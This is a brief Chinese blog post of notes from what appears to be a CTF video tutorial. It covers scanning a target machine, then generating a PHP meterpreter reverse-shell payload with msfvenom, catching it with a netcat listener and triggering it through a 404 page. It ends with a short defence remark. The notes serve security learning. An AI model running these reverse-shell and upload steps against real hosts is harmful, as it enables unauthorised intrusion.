CTF-B站教程

参考

信息搜集

主机发现工具

几个命令行工具:

  • arp-scan
  • netdiscover
  • fping

快速扫描局域网可以用: arp-scan -l

端口扫描工具

使用 nmap 命令, 如:

1
$ nmap -sS -sV -p- -v -T4 靶机IP

参数:

3306 一般是 mysql 服务.

浏览器的 Wappalyzer 插件可以获得很多信息.

目录扫描

命令行工具:

  • dirb
  • dirbuster

如使用 dirb:

1
$ dirb + url

修改 root 密码

反弹 shell

如用 msfvenom 命令:

1
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.70.216 LPORT=4444 -o Desctop/shell.php

获取 shell

使用 netcat 这个命令:

1
$ nc -nlvp 4444

可以用 whoami 查看当前权限.

权限提升

小结

主要就是上传有害脚本让目标主机执行.

访问目标主机上的不存在页面,使其触发执行 404 的代码.

感觉需要了解现有的漏洞,然后查看目标主机上是否存在.

防御方法,避免常见及默认的路径名,用户名. 实时了解最新漏洞.


CTF-B站教程
http://example.com/2022/11/23/CTF-B站教程/
作者
Jie
发布于
2022年11月23日
许可协议